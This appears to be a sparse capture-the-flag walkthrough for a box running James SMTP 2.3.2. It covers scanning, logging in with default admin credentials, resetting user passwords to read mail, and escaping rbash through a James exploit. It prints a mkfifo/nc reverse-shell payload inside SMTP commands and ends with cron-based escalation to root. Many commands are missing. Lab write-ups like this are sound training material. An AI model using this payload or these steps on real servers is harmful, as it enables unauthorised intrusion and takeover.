1. Network Discovery

2. Port scan

namp -Pn -p1000-

3. OS and service scan

4. Vuln scan

5. Starting w/ port 80


Directory scan

Access the site

View page source, nothing


Try XXS, but nothing happened.

Maybe some username?

6. Next one is port 25: JAMES smtpd 2.3.2.

I came across this guide

Username: rootPassword: root

I changed all password

Access these account w/ pop3 service on port 110 using thunderbird

John: there’s a message

Mindy: there’re 2 messages.

I have mindy username and password to login to ssh.

7. login w/ mindy’s credential

cat user.txt

Try exploring system


Read passwd

I’m restricted because of rbash, cannot do anything

8. James 2.3.2: Get ack to exploitation guide

Follow the guide

I have to supply the reverse shell command

Prepare listener on port 443

Connect to port 25

Following the guide and using reverse shell cheatsheet

MAIL FROM: <'>RCPT TO: <../../../../../../../../etc/bash_completion.d>DATAFrom: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f.

Login w/ mindy again, you will see some weird stuff.

Back to listener, now I have a shell

8. Privilege escalation

I need TTY shell.

I want to run

Prepare SimpleHTTPServer on attacker machine

Download the script


Chnage permission and run

/tmp/ -t

The machine is 32-bit.

There’s /opt/tmp/py -> very interesting

Cannot do anything with these files

Noting on SUID/SGID

Nothing on cron

Verify sudo

No command

Verify capabilities

Let’s check some services beside cron job

I found this ‘cron -f’. There must have something running in the background.

Observe system w/ pspy

This machine is 32-bit. I will download pspy32 to the machine.

chmod 777 pspy 32/tmp/pspy32

Wait for observation and I got this. It’s that ‘/opt/’.

Read the file.


I can append the script w/ this command to get root shell.


Waiting for a while

ls -la

Now I got /tmp/rootbash

Run it


Now I’m root

Get root.txt

ls -lacat root.txt